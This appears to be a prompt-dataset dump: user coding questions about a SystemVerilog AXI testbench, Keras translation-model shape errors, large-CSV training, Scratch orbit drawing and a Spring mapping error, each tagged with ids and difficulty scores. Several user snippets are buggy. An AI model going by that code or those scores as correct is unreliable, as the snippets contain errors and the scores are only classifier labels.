// AMBA AXI interface (R channel)
.rid_i (rid_i),
.rdata_i (rdata_i),
.rresp_i (rresp_i),
.rlast_i (rlast_i),
.rvalid_i (rvalid_i),
.rready_o (rready_o)
);
endmodule
<<<EndOfFile:DMAC/RTL/DMAC_TOP.sv>>>
<<<StartOfFile:DMAC/SIM/TB/AXI_INTF.sv>>>
`include "../TB/AXI_TYPEDEF.svh"
interface AXI_AW_CH
#(
parameter ADDR_WIDTH = `AXI_ADDR_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic awvalid;
logic awready;
logic [ID_WIDTH-1:0] awid;
logic [ADDR_WIDTH-1:0] awaddr;
logic [3:0] awlen;
logic [2:0] awsize;
logic [1:0] awburst;
endinterface
interface AXI_W_CH
#(
parameter DATA_WIDTH = `AXI_DATA_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic wvalid;
logic wready;
logic [ID_WIDTH-1:0] wid;
logic [DATA_WIDTH-1:0] wdata;
logic [DATA_WIDTH/8-1:0] wstrb;
logic wlast;
endinterface
interface AXI_B_CH
#(
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic bvalid;
logic bready;
logic [ID_WIDTH-1:0] bid;
logic [1:0] bresp;
endinterface
interface AXI_AR_CH
#(
parameter ADDR_WIDTH = `AXI_ADDR_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic arvalid;
logic arready;
logic [ID_WIDTH-1:0] arid;
logic [ADDR_WIDTH-1:0] araddr;
logic [3:0] arlen;
logic [2:0] arsize;
logic [1:0] arburst;
endinterface
interface AXI_R_CH
#(
parameter DATA_WIDTH = `AXI_DATA_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic rvalid;
logic rready;
logic [ID_WIDTH-1:0] rid;
logic [DATA_WIDTH-1:0] rdata;
logic [1:0] rresp;
logic rlast;
endinterface
interface APB (
input clk
);
logic psel;
logic penable;
logic [31:0] paddr;
logic pwrite;
logic [31:0] pwdata;
logic pready;
logic [31:0] prdata;
logic pslverr;
modport master (
input clk,
input pready, prdata, pslverr,
output psel, penable, paddr, pwrite, pwdata
);
task init();
psel = 1'b0;
penable = 1'b0;
paddr = 32'd0;
pwrite = 1'b0;
pwdata = 32'd0;
endtask
task write(input int addr,
input int data);
#1
psel = 1'b1;
penable = 1'b0;
paddr = addr;
pwrite = 1'b1;
pwdata = data;
@(posedge clk);
#1
penable = 1'b1;
@(posedge clk);
while (pready==1'b0) begin
@(posedge clk);
end
psel = 1'b0;
penable = 1'b0;
paddr = 'hX;
pwrite = 1'bx;
pwdata = 'hX;
endtask
task read(input int addr,
output int data);
#1
psel = 1'b1;
penable = 1'b0;
paddr = addr;
pwrite = 1'b0;
pwdata = 'hX;
@(posedge clk);
#1
penable = 1'b1;
@(posedge clk);
while (pready==1'b0) begin
@(posedge clk);
end
data = prdata;
psel = 1'b0;
penable = 1'b0;
paddr = 'hX;
pwrite = 1'bx;
pwdata = 'hX;
endtask
endinterface
<<<EndOfFile:DMAC/SIM/TB/AXI_INTF.sv>>>
<<<StartOfFile:DMAC/SIM/TB/AXI_SLAVE.sv>>>
`include "../TB/AXI_TYPEDEF.svh"
module AXI_SLAVE
#(
parameter ADDR_WIDTH = 16,
parameter DATA_WIDTH = `AXI_DATA_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH,
parameter AWREADY_DELAY = 1,
parameter ARREADY_DELAY = 1,
parameter AR2R_DELAY = 50
)
(
input wire clk,
input wire rst_n, // _n means active low
AXI_AW_CH aw_ch,
AXI_W_CH w_ch,
AXI_B_CH b_ch,
AXI_AR_CH ar_ch,
AXI_R_CH r_ch
);
localparam DATA_DEPTH = 1<<ADDR_WIDTH;
logic [7:0] mem[DATA_DEPTH];
function void write_byte(int addr, input bit [7:0] wdata);
mem[addr] = wdata;
endfunction
function void write_word(int addr, input bit [31:0] wdata);
for (int i=0; i<4; i++) begin
write_byte(addr+i, wdata[8*i +: 8]); // [i*8+7:i*8]
end
endfunction
function bit [7:0] read_byte(int addr);
read_byte = mem[addr];
endfunction
function bit [31:0] read_word(int addr);
for (int i=0; i<4; i++) begin
read_word[8*i +: 8] = read_byte(addr+i);// [i*8+7:i*8]
end
endfunction
//----------------------------------------------------------
// write channels (AW, W, B)
//----------------------------------------------------------
localparam logic [1:0] S_W_IDLE = 0,
S_W_AWREADY = 1,
S_W_BURST = 2,
S_W_RESP = 3;
logic [1:0] wstate, wstate_n;
logic [7:0] wcnt, wcnt_n;
logic [ADDR_WIDTH-1:0] waddr, waddr_n;
logic [ID_WIDTH-1:0] wid, wid_n;
logic [3:0] wlen, wlen_n;
always_ff @(posedge clk)
if (!rst_n) begin
wstate <= S_W_IDLE;
wcnt <= 8'd0;
waddr <= {ADDR_WIDTH{1'b0}};
wid <= {ID_WIDTH{1'b0}};
wlen <= 4'd0;
end
else begin
wstate <= wstate_n;
wcnt <= wcnt_n;
waddr <= waddr_n;
wid <= wid_n;
wlen <= wlen_n;
end
always @(*) begin
wstate_n = wstate;
wcnt_n = wcnt;
waddr_n = waddr;
wid_n = wid;
wlen_n = wlen;
aw_ch.awready = 1'b0;
w_ch.wready = 1'b0;
b_ch.bvalid = 1'b0;
case (wstate)
S_W_IDLE: begin
if (aw_ch.awvalid) begin
if (AWREADY_DELAY == 0) begin
waddr_n = aw_ch.awaddr;
wid_n = aw_ch.awid;
wlen_n = aw_ch.awlen;
aw_ch.awready = 1'b1;
wstate_n = S_W_BURST;
end
else begin
wcnt_n = AWREADY_DELAY-1;
wstate_n = S_W_AWREADY;
end
end
end
S_W_AWREADY: begin
if (wcnt==0) begin
waddr_n = aw_ch.awaddr;
wid_n = aw_ch.awid;
wlen_n = aw_ch.awlen;
aw_ch.awready = 1'b1;
wstate_n = S_W_BURST;
end
else begin
wcnt_n = wcnt - 8'd1;
end
end
S_W_BURST: begin
w_ch.wready = 1'b1;
if (w_ch.wvalid) begin
for (int i=0; i<DATA_WIDTH/8; i++) begin
write_byte(waddr + i, w_ch.wdata[i*8 +: 8]); // [i*8+7:i*8]
end
waddr_n = waddr + (DATA_WIDTH/8);
if (wlen==4'd0) begin
wstate_n = S_W_RESP;
end
else begin
wlen_n = wlen - 4'd1;
end
end
end
S_W_RESP: begin
b_ch.bvalid = 1'b1;
if (b_ch.bready) begin
wstate_n = S_W_IDLE;
end
end
endcase
end
//----------------------------------------------------------
// read channel (AR, R)
//----------------------------------------------------------
localparam logic [1:0] S_R_IDLE = 0,
S_R_ARREADY = 1,
S_R_DELAY = 2,
S_R_BURST = 3;
logic [1:0] rstate, rstate_n;
logic [7:0] rcnt, rcnt_n;
logic [ADDR_WIDTH-1:0] raddr, raddr_n;
logic [ID_WIDTH-1:0] rid, rid_n;
logic [3:0] rlen, rlen_n;
always_ff @(posedge clk)
if (!rst_n) begin
rstate <= S_R_IDLE;
rcnt <= 8'd0;
raddr <= {ADDR_WIDTH{1'b0}};
rid <= {ID_WIDTH{1'b0}};
rlen <= 4'd0;
end
else begin
rstate <= rstate_n;
rcnt <= rcnt_n;
raddr <= raddr_n;
rid <= rid_n;
rlen <= rlen_n;
end
always_comb begin
rstate_n = rstate;
rcnt_n = rcnt;
raddr_n = raddr;
rid_n = rid;
rlen_n = rlen;
ar_ch.arready = 1'b0;
r_ch.rvalid = 1'b0;
r_ch.rlast = 1'b0;
case (rstate)
S_R_IDLE: begin
if (ar_ch.arvalid) begin
if (ARREADY_DELAY == 0) begin
raddr_n = ar_ch.araddr;
rid_n = ar_ch.arid;
rlen_n = ar_ch.arlen;
ar_ch.arready = 1'b1;
rcnt_n = AR2R_DELAY - 1;
rstate_n = S_R_DELAY;
end
else begin
rcnt_n = ARREADY_DELAY-1;
rstate_n = S_R_ARREADY;
end
end
end
S_R_ARREADY: begin
if (rcnt==0) begin
raddr_n = ar_ch.araddr;
rid_n = ar_ch.arid;
rlen_n = ar_ch.arlen;
ar_ch.arready = 1'b1;
rcnt_n = AR2R_DELAY - 1;
rstate_n = S_R_DELAY;
end
else begin
rcnt_n = rcnt - 8'd1;
end
end
S_R_DELAY: begin
if (rcnt==0) begin
rstate_n = S_R_BURST;
end
else begin
rcnt_n = rcnt - 8'd1;
end
end
S_R_BURST: begin
r_ch.rvalid = 1'b1;
r_ch.rlast = (rlen==4'd0);
for (int i=0; i<DATA_WIDTH/8; i++) begin
r_ch.rdata[i*8 +: 8] = read_byte(raddr + i); // [i*8+7:i*8]
end
if (r_ch.rready) begin
raddr_n = raddr + (DATA_WIDTH/8);
if (rlen==4'd0) begin
rstate_n = S_R_IDLE;
end
else begin
rlen_n = rlen - 4'd1;
end
end
end
endcase
end
// output assignments
assign b_ch.bid = wid;
assign b_ch.bresp = 2'd0;
assign r_ch.rid = rid;
assign r_ch.rresp = 2'd0;
endmodule
<<<EndOfFile:DMAC/SIM/TB/AXI_SLAVE.sv>>>
<<<StartOfFile:DMAC/SIM/TB/AXI_TYPEDEF.svh>>>
`ifndef __AXI_TYPEDEF_SVH__
`define __AXI_TYPEDEF_SVH__
`define AXI_ADDR_WIDTH 32
`define AXI_DATA_WIDTH 32
`define AXI_ID_WIDTH 4
`endif /* __AXI_TYPEDEF_SVH__ */
<<<EndOfFile:DMAC/SIM/TB/AXI_TYPEDEF.svh>>>
|
6a6f7e45e97dcf3b4af40b330b95463c
|
{
"intermediate": 0.3662366569042206,
"beginner": 0.39106234908103943,
"expert": 0.24270100891590118
}
|
46,769
|
%%time
!pip install -q -U tensorflow-text
!pip install datasets
!pip install -q tensorflow_datasets
!pip install pydot
!cd /content
!clear
import tensorflow as tf
import tensorflow_text as tf_text
import tensorflow_datasets as tfds
import numpy as np
import matplotlib.pyplot as plt
import requests
import functools
import collections
import os
import pathlib
import re
import string
import tempfile
import time
import matplotlib.pyplot as plt
import os
import re
import shutil
import string
import tensorflow as tf
from tensorflow.keras import layers
from tensorflow.keras import losses
import pydot
from datasets import load_dataset
dataset = load_dataset(“Helsinki-NLP/opus_books”, “en-fr”)
data = dataset[“train”]
french_sentences = [example[“fr”] for example in data[“translation”][:127085]]
english_sentences = [example[“en”] for example in data[“translation”][:127085]]
dataset = tf.data.Dataset.from_tensor_slices((french_sentences, english_sentences))
french_sentences_decoded = []
english_sentences_decoded = []
for french_sentence, english_sentence in dataset.take(127085):
french_sentences_decoded.append(“b '”+french_sentence.numpy().decode(‘utf-8’))
english_sentences_decoded.append(“b '”+english_sentence.numpy().decode(‘utf-8’))
print(“Nombre de phrases en français :”, len(french_sentences_decoded))
print(“Nombre de phrases en anglais :”, len(english_sentences_decoded))
train_fr = french_sentences
train_en = english_sentences
from tensorflow_text.tools.wordpiece_vocab import bert_vocab_from_dataset as bert_vocab
bert_tokenizer_params = dict(lower_case=True)
reserved_tokens = [“[PAD]”, “[UNK]”, “[START]”, “[END]”]
bert_vocab_args = {
‘vocab_size’: 8000,
‘reserved_tokens’: reserved_tokens,
‘bert_tokenizer_params’: bert_tokenizer_params,
‘learn_params’: {},
}
%%time
en_vocab = bert_vocab.bert_vocab_from_dataset(
tf.data.Dataset.from_tensor_slices(english_sentences).batch(1000).prefetch(2),
**bert_vocab_args
)
%%time
fr_vocab = bert_vocab.bert_vocab_from_dataset(
tf.data.Dataset.from_tensor_slices(french_sentences).batch(1000).prefetch(2),
**bert_vocab_args
)
def write_vocab_file(filepath, vocab):
with open(filepath, ‘w’) as f:
for token in vocab:
print(token, file=f)
write_vocab_file(‘en_vocab.txt’, en_vocab)
write_vocab_file(‘fr_vocab.txt’, fr_vocab)
def write_vocab_file(filepath, vocab):
with open(filepath, ‘w’) as f:
for token in vocab:
print(token, file=f)
write_vocab_file(‘en_vocab.txt’, en_vocab)
write_vocab_file(‘fr_vocab.txt’, fr_vocab)
# Tokenize the examples -> (batch, word, word-piece)
en_tokenizere = en_tokenizer.tokenize(“hello how are you Vadim”)
# Merge the word and word-piece axes -> (batch, tokens)
en_tokenizere= en_tokenizere.merge_dims(-2,-1)
for ex in en_tokenizere.to_list():
print(ex)
max_length = 200
fr_sequences = [fr_tokenizer.tokenize(french_sentence.numpy().decode(‘utf-8’)).merge_dims(-2,-1)
for french_sentence, _ in dataset.take(1000)]
fr_ragged = tf.ragged.stack(fr_sequences)
fr_padded = fr_ragged.to_tensor(default_value=0, shape=[None, None, max_length])
en_sequences = [en_tokenizer.tokenize(english_sentence.numpy().decode(‘utf-8’)).merge_dims(-2,-1)
for _, english_sentence in dataset.take(1000)]
en_ragged = tf.ragged.stack(en_sequences)
en_padded = en_ragged.to_tensor(default_value=0, shape=[None, None, max_length])
x_train = fr_padded
y_train = en_padded
import numpy as np
import tensorflow as tf
from tensorflow.keras import layers, models
def get_positional_encoding(seq_len, d_model):
positions = np.arange(seq_len)[:, np.newaxis]
div_term = np.exp(np.arange(0, d_model, 2) * -(np.log(10000.0) / d_model))
pe = np.zeros((seq_len, d_model))
pe[:, 0::2] = np.sin(positions * div_term)
pe[:, 1::2] = np.cos(positions * div_term)
return pe
class TransformerBlock(layers.Layer):
def init(self, embed_dim, num_heads, ff_dim, rate=0.1):
super(TransformerBlock, self).init()
self.att = layers.MultiHeadAttention(num_heads=num_heads, key_dim=embed_dim)
self.ffn = tf.keras.Sequential(
[layers.Dense(ff_dim, activation=“relu”), layers.Dense(embed_dim)]
)
self.layernorm1 = layers.LayerNormalization(epsilon=1e-6)
self.layernorm2 = layers.LayerNormalization(epsilon=1e-6)
self.dropout1 = layers.Dropout(rate)
self.dropout2 = layers.Dropout(rate)
def call(self, inputs, training=False):
attn_output = self.att(inputs, inputs)
attn_output = self.dropout1(attn_output, training=training)
out1 = self.layernorm1(inputs + attn_output)
ffn_output = self.ffn(out1)
ffn_output = self.dropout2(ffn_output, training=training)
return self.layernorm2(out1 + ffn_output)
class TokenAndPositionEmbedding(layers.Layer):
def init(self, maxlen, vocab_size, embed_dim):
super(TokenAndPositionEmbedding, self).init()
self.token_emb = layers.Embedding(input_dim=vocab_size, output_dim=embed_dim)
self.pos_emb = layers.Embedding(input_dim=maxlen, output_dim=embed_dim)
def call(self, x):
maxlen = tf.shape(x)[-1]
positions = tf.range(start=0, limit=maxlen, delta=1)
positions = self.pos_emb(positions)
x = self.token_emb(x)
return x + positions
# Model Construction
vocab_size = 20000 # Example vocabulary size
embed_dim = 200 # Embedding size for each token
num_heads = 8 # Number of attention heads
ff_dim = 2048 # Hidden layer size in feed forward network inside transformer
inputs = layers.Input(shape=(200,))
embedding_layer = TokenAndPositionEmbedding(200, vocab_size, embed_dim)
x = embedding_layer(inputs)
transformer_block = TransformerBlock(embed_dim, num_heads, ff_dim)
x = transformer_block(x, training=True) # Just as an example. In practice, training can be dynamically set.
x = layers.GlobalAveragePooling1D()(x)
outputs = layers.Dense(vocab_size, activation=“softmax”)(x)
model = models.Model(inputs=inputs, outputs=outputs)
model.compile(optimizer=“adam”, loss=“sparse_categorical_crossentropy”, metrics=[“accuracy”])
model.summary()
history = model.fit(x_train, y_train, epochs=10, batch_size = 2)
is my code in google colab cells by cell and i will ask to you why in the cells “history = model.fit(x_train, y_train, epochs=10, batch_size = 2)” they reply to me an error message your goal is to fix the probleme by proposing a cells change :
Epoch 1/10
---------------------------------------------------------------------------
ValueError Traceback (most recent call last)
<ipython-input-225-dad0d896f5c0> in <cell line: 1>()
----> 1 history = model.fit(x_train, y_train, epochs=10, batch_size = 2)
1 frames
/usr/local/lib/python3.10/dist-packages/keras/src/utils/traceback_utils.py in error_handler(*args, **kwargs)
120 # To get the full stack trace, call:
121 # keras.config.disable_traceback_filtering()
–> 122 raise e.with_traceback(filtered_tb) from None
123 finally:
124 del filtered_tb
/usr/local/lib/python3.10/dist-packages/keras/src/layers/input_spec.py in assert_input_compatibility(input_spec, inputs, layer_name)
243 if spec_dim is not None and dim is not None:
244 if spec_dim != dim:
–> 245 raise ValueError(
246 f’Input {input_index} of layer “{layer_name}” is '
247 "incompatible with the layer: "
ValueError: Input 0 of layer “functional_140” is incompatible with the layer: expected shape=(None, 200), found shape=(2, 1, 200)
|
2a672823bb92aaa2b3b0c94af1091751
|
{
"intermediate": 0.3316658139228821,
"beginner": 0.4265757203102112,
"expert": 0.24175843596458435
}
|
46,770
|
hugging face workspace that can take text story and make a video from it
|
6f78f65aeb4541ccfdb8962912e9dc71
|
{
"intermediate": 0.32733479142189026,
"beginner": 0.18716956675052643,
"expert": 0.4854956269264221
}
|
46,771
|
i want to train a model on my dataset(which is a large csv file 27GB size) to predict to value for each row: Prior_1 and Prior_2
due to the size of my csv file i cant read it as df at once
give me proper python code to train a model on my dataset
|
4441969af470efff0af1e5e893dce548
|
{
"intermediate": 0.48868417739868164,
"beginner": 0.1387758105993271,
"expert": 0.3725399971008301
}
|
46,772
|
print("x_train shape:", x_train.shape)
print("y_train shape:", y_train.shape)
history = model.fit(x_train, y_train, epochs=10, batch_size=2)
x_train shape: (10000, 200)
y_train shape: (10000, 200)
Epoch 1/10
---------------------------------------------------------------------------
ValueError Traceback (most recent call last)
<ipython-input-236-e93fc86f4a99> in <cell line: 4>()
2 print("y_train shape:", y_train.shape)
3
----> 4 history = model.fit(x_train, y_train, epochs=10, batch_size=2)
1 frames
/usr/local/lib/python3.10/dist-packages/keras/src/utils/traceback_utils.py in error_handler(*args, **kwargs)
120 # To get the full stack trace, call:
121 # `keras.config.disable_traceback_filtering()`
--> 122 raise e.with_traceback(filtered_tb) from None
123 finally:
124 del filtered_tb
/usr/local/lib/python3.10/dist-packages/keras/src/backend/tensorflow/nn.py in sparse_categorical_crossentropy(target, output, from_logits, axis)
640 )
641 if len(target.shape) != len(output.shape[:-1]):
--> 642 raise ValueError(
643 "Argument `output` must have rank (ndim) `target.ndim - 1`. "
644 "Received: "
ValueError: Argument `output` must have rank (ndim) `target.ndim - 1`. Received: target.shape=(2, 200), output.shape=(2, 20000)
|
a14c6528f43183a089829aa2422e9620
|
{
"intermediate": 0.5270666480064392,
"beginner": 0.24094583094120026,
"expert": 0.23198749125003815
}
|
46,773
|
Hello, i build an traduction ai using tensorflow now i have tokenize the dataset with my code and i use google colab cells by cells code I can not build a model optimized for ai translation your goal is to build a model of translation for tensorflow with my actual code this is my actual code :
%%time
!pip install -q -U tensorflow-text
!pip install datasets
!pip install -q tensorflow_datasets
!pip install pydot
!cd /content
!clear
import tensorflow as tf
import tensorflow_text as tf_text
import tensorflow_datasets as tfds
import numpy as np
import matplotlib.pyplot as plt
import requests
import functools
import collections
import os
import pathlib
import re
import string
import tempfile
import time
import matplotlib.pyplot as plt
import os
import re
import shutil
import string
import tensorflow as tf
from tensorflow.keras import layers
from tensorflow.keras import losses
import pydot
from datasets import load_dataset
dataset = load_dataset("Helsinki-NLP/opus_books", "en-fr")
data = dataset["train"]
french_sentences = [example["fr"] for example in data["translation"][:127085]]
english_sentences = [example["en"] for example in data["translation"][:127085]]
dataset = tf.data.Dataset.from_tensor_slices((french_sentences, english_sentences))
french_sentences_decoded = []
english_sentences_decoded = []
for french_sentence, english_sentence in dataset.take(127085):
french_sentences_decoded.append("b '"+french_sentence.numpy().decode('utf-8'))
english_sentences_decoded.append("b '"+english_sentence.numpy().decode('utf-8'))
print("Nombre de phrases en français :", len(french_sentences_decoded))
print("Nombre de phrases en anglais :", len(english_sentences_decoded))
train_fr = french_sentences
train_en = english_sentences
from tensorflow_text.tools.wordpiece_vocab import bert_vocab_from_dataset as bert_vocab
bert_tokenizer_params = dict(lower_case=True)
reserved_tokens = ["[PAD]", "[UNK]", "[START]", "[END]"]
bert_vocab_args = {
'vocab_size': 8000,
'reserved_tokens': reserved_tokens,
'bert_tokenizer_params': bert_tokenizer_params,
'learn_params': {},
}
%%time
en_vocab = bert_vocab.bert_vocab_from_dataset(
tf.data.Dataset.from_tensor_slices(english_sentences).batch(1000).prefetch(2),
**bert_vocab_args
)
%%time
fr_vocab = bert_vocab.bert_vocab_from_dataset(
tf.data.Dataset.from_tensor_slices(french_sentences).batch(1000).prefetch(2),
**bert_vocab_args
)
def write_vocab_file(filepath, vocab):
with open(filepath, 'w') as f:
for token in vocab:
print(token, file=f)
write_vocab_file('en_vocab.txt', en_vocab)
write_vocab_file('fr_vocab.txt', fr_vocab)
fr_tokenizer = tf_text.BertTokenizer('fr_vocab.txt', **bert_tokenizer_params)
en_tokenizer = tf_text.BertTokenizer('en_vocab.txt', **bert_tokenizer_params)
# Tokenize the examples -> (batch, word, word-piece)
en_tokenizere = en_tokenizer.tokenize("hello how are you Vadim")
# Merge the word and word-piece axes -> (batch, tokens)
en_tokenizere= en_tokenizere.merge_dims(-2,-1)
for ex in en_tokenizere.to_list():
print(ex)
|
47ba36c16b33b0838e18fcee7afb7f43
|
{
"intermediate": 0.3630707263946533,
"beginner": 0.3557378947734833,
"expert": 0.2811913788318634
}
|
46,774
|
i want to train a NN model on my dataset(which is a large csv file 27GB size) to predict to value for each row: Prior_1 and Prior_2
due to the size of my csv file i cant read it as df at once
give me proper python code to train a model on my dataset
|
9f0534ec4f39bac8c62452e102d8a43a
|
{
"intermediate": 0.3014947175979614,
"beginner": 0.08235567063093185,
"expert": 0.6161496639251709
}
|
46,775
|
Hello, i build an traduction ai using tensorflow now i have tokenize the dataset with my code and i use google colab cells by cells code I can not build a model optimized for ai translation your goal is to build the cell of the model with keras modl build and model compile for the best performance in translation :
%%time
!pip install -q -U tensorflow-text
!pip install datasets
!pip install -q tensorflow_datasets
!pip install pydot
!cd /content
!clear
import tensorflow as tf
import tensorflow_text as tf_text
import tensorflow_datasets as tfds
import numpy as np
import matplotlib.pyplot as plt
import requests
import functools
import collections
import os
import pathlib
import re
import string
import tempfile
import time
import matplotlib.pyplot as plt
import os
import re
import shutil
import string
import tensorflow as tf
from tensorflow.keras import layers
from tensorflow.keras import losses
import pydot
from datasets import load_dataset
dataset = load_dataset(“Helsinki-NLP/opus_books”, “en-fr”)
data = dataset[“train”]
french_sentences = [example[“fr”] for example in data[“translation”][:127085]]
english_sentences = [example[“en”] for example in data[“translation”][:127085]]
dataset = tf.data.Dataset.from_tensor_slices((french_sentences, english_sentences))
french_sentences_decoded = []
english_sentences_decoded = []
for french_sentence, english_sentence in dataset.take(127085):
french_sentences_decoded.append(“b '”+french_sentence.numpy().decode(‘utf-8’))
english_sentences_decoded.append(“b '”+english_sentence.numpy().decode(‘utf-8’))
print(“Nombre de phrases en français :”, len(french_sentences_decoded))
print(“Nombre de phrases en anglais :”, len(english_sentences_decoded))
train_fr = french_sentences
train_en = english_sentences
from tensorflow_text.tools.wordpiece_vocab import bert_vocab_from_dataset as bert_vocab
bert_tokenizer_params = dict(lower_case=True)
reserved_tokens = [“[PAD]”, “[UNK]”, “[START]”, “[END]”]
bert_vocab_args = {
‘vocab_size’: 8000,
‘reserved_tokens’: reserved_tokens,
‘bert_tokenizer_params’: bert_tokenizer_params,
‘learn_params’: {},
}
%%time
en_vocab = bert_vocab.bert_vocab_from_dataset(
tf.data.Dataset.from_tensor_slices(english_sentences).batch(1000).prefetch(2),
**bert_vocab_args
)
%%time
fr_vocab = bert_vocab.bert_vocab_from_dataset(
tf.data.Dataset.from_tensor_slices(french_sentences).batch(1000).prefetch(2),
**bert_vocab_args
)
def write_vocab_file(filepath, vocab):
with open(filepath, ‘w’) as f:
for token in vocab:
print(token, file=f)
write_vocab_file(‘en_vocab.txt’, en_vocab)
write_vocab_file(‘fr_vocab.txt’, fr_vocab)
fr_tokenizer = tf_text.BertTokenizer(‘fr_vocab.txt’, **bert_tokenizer_params)
en_tokenizer = tf_text.BertTokenizer(‘en_vocab.txt’, **bert_tokenizer_params)
# Tokenize the examples -> (batch, word, word-piece)
en_tokenizere = en_tokenizer.tokenize(“hello how are you Vadim”)
# Merge the word and word-piece axes -> (batch, tokens)
en_tokenizere= en_tokenizere.merge_dims(-2,-1)
for ex in en_tokenizere.to_list():
print(ex)
|
7912e9241524ade784a0ef160cb70fa5
|
{
"intermediate": 0.3689960241317749,
"beginner": 0.3881682753562927,
"expert": 0.24283570051193237
}
|
46,776
|
{
"name": "NotImplementedError",
"message": "Iterating over a symbolic KerasTensor is not supported.",
"stack": "---------------------------------------------------------------------------
NotImplementedError Traceback (most recent call last)
Cell In[33], line 5
2 batch_size = 128
4 # Instantiate the model
----> 5 model = build_model()
7 model.summary()
Cell In[32], line 10, in build_model()
6 input_shape = (6427,)
8 inputs = Input(shape=input_shape)
---> 10 model = Sequential([
11 Dense(6427, activation='relu', input_shape = inputs),
12 Dropout(0.25),
13 Dense(3200, activation='relu'),
14 Dropout(0.20),
15 Dense(1800, activation='relu'),
16 Dropout(0.15),
17 Dense(1024, activation='relu'),
18 Dropout(0.10),
19 Dense(512, activation='relu'),
20 Dropout(0.05),
21 Dense(256, activation='relu'),
22 Dense(128, activation='relu'),
23 Dense(64, activation='relu'),
24 Dense(32, activation='relu')
25 ])
27 model.compile(optimizer='adam',
28 loss='mse', # Use Mean Squared Error for regression
29 metrics=['mae']) # Mean Absolute Error as an additional metric
30 return model
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\models\\sequential.py:73, in Sequential.__init__(self, layers, trainable, name)
71 if layers:
72 for layer in layers:
---> 73 self.add(layer, rebuild=False)
74 self._maybe_rebuild()
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\models\\sequential.py:86, in Sequential.add(self, layer, rebuild)
84 if not self._layers:
85 if getattr(layer, \"_input_shape_arg\", None) is not None:
---> 86 self.add(InputLayer(shape=layer._input_shape_arg))
88 # If we are passed a Keras tensor created by keras.Input(), we
89 # extract the input layer from its keras history and use that.
90 if hasattr(layer, \"_keras_history\"):
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\layers\\core\\input_layer.py:46, in InputLayer.__init__(self, shape, batch_size, dtype, sparse, batch_shape, input_tensor, name, **kwargs)
43 raise ValueError(\"You must pass a `shape` argument.\")
45 if shape is not None:
---> 46 shape = backend.standardize_shape(shape)
47 batch_shape = (batch_size,) + shape
48 self.batch_shape = tuple(batch_shape)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\backend\\common\\variables.py:510, in standardize_shape(shape)
506 if isinstance(shape, tf.TensorShape):
507 # `tf.TensorShape` may contain `Dimension` objects.
508 # We need to convert the items in it to either int or `None`
509 shape = shape.as_list()
--> 510 shape = tuple(shape)
512 if config.backend() == \"torch\":
513 # `shape` might be `torch.Size`. We need to convert the items in it to
514 # either int or `None`
515 shape = tuple(map(lambda x: int(x) if x is not None else None, shape))
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\backend\\common\\keras_tensor.py:120, in KerasTensor.__iter__(self)
119 def __iter__(self):
--> 120 raise NotImplementedError(
121 \"Iterating over a symbolic KerasTensor is not supported.\"
122 )
NotImplementedError: Iterating over a symbolic KerasTensor is not supported."
}
|
be8e31cd98cf29b6ae560562787799e7
|
{
"intermediate": 0.3306133449077606,
"beginner": 0.43303394317626953,
"expert": 0.23635269701480865
}
|
46,777
|
`when 🏳️ clicked`
`🖊️ erase all`
`set a to 149597870.7`
`set e to 0.7`
`set ν to 92`
`set ω to 76`
`set Zoom to 2000000`
`set Mass to 1.98847e30`
`set t to 1`
`set RO to 0`
`🖊️ set pen color to #FFFFFF`
`🖊️ set pen size to 1`
`🖊️ pen up`
`forever`
`{`
`_set r to {a * (1 - e^2) / (1 + (e * cos of (ν)}`
`_set X to {r * cos of (ν + ω)}`
`_set Y to {r * sin of (ν + ω)}`
`_go to x: {X / Zoom} y: {Y / Zoom}`
`_🖊️ pen down`
`}`
|
ed3f91c5cdc0bf8668f2c8bce8b049bc
|
{
"intermediate": 0.2755393981933594,
"beginner": 0.30851060152053833,
"expert": 0.41594991087913513
}
|
46,778
|
make it 1 liner
for session, session_info in sessions.items():
if session_info['posts sent']:
length_with_posts+=1
|
89e4b481eb8aaf8459097708477abd20
|
{
"intermediate": 0.4210500121116638,
"beginner": 0.29917940497398376,
"expert": 0.2797706127166748
}
|
46,779
|
make it 1 liner
for session, session_info in sessions.items():
if session_info[‘posts sent’]:
length_with_posts+=1
|
b5a69b1412ce955b31baa7a946a1a69d
|
{
"intermediate": 0.27735060453414917,
"beginner": 0.5434809923171997,
"expert": 0.17916841804981232
}
|
46,780
|
В чем проблема? Caused by: java.lang.IllegalStateException: Ambiguous handler methods mapped for HTTP path 'http://localhost:8080/acq-company-web/': {public java.lang.String com.ncs.company.web.controller.IndexController.showIndex(org.springframework.ui.Model,org.springframework.security.core.Authentication,javax.servlet.http.HttpServletRequest), public java.lang.String com.ncs.company.web.controller.IndexControllerNew.showIndex(org.springframework.ui.Model,org.springframework.security.core.Authentication,javax.servlet.http.HttpServletRequest)}
at deployment.acq-company-web.war//org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.lookupHandlerMethod(AbstractHandlerMethodMapping.java:367)
at deployment.acq-company-web.war//org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.getHandlerInternal(AbstractHandlerMethodMapping.java:314)
at deployment.acq-company-web.war//org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.getHandlerInternal(AbstractHandlerMethodMapping.java:61)
at deployment.acq-company-web.war//org.springframework.web.servlet.handler.AbstractHandlerMapping.getHandler(AbstractHandlerMapping.java:352)
at deployment.acq-company-web.war//org.springframework.web.servlet.DispatcherServlet.getHandler(DispatcherServlet.java:1160)
at deployment.acq-company-web.war//org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:940)
